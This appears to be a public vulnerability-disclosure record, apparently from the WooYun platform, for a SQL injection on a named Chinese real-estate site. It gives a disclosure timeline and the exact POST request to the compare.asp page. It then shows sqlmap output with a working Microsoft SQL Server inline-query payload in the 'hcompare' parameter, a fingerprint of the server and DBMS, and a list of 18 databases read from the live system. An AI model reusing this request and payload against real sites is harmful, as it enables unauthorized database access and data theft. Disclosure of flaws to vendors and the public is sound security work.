2016-01-18: Details reported to the vendor; awaiting vendor handling
2016-01-23: The vendor chose to ignore the vulnerability; details disclosed to the public
POST /lp/compare.asp HTTP/1.1
Content-Length: 219
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDASRBBASQ=BKLNFEAAIHDDGGKFKLIIPFBM
Host: house.e23.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

hcompare=1&ob=http://house.e23.cn/lp/list.asp%3fob%3d1
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: hcompare (POST)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: hcompare=(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2506=2506) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113))&ob=http://house.e23.cn/lp/list.asp?ob=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [18]:
[*] fangchan
[*] fangtan
[*] fangtannew
[*] jiaju
[*] kfccs
[*] master
[*] model
[*] msdb
[*] MSRM2
[*] NewPublish
[*] newszt
[*] Northwind
[*] peixun
[*] pubs
[*] ReviewForJiNan
[*] shiping
[*] tempdb
[*] tvvtvdata
Severity: No impact (ignored by vendor)
Ignored at: 2016-01-23 09:50
Vulnerability Rank: 4 (WooYun rating)
None yet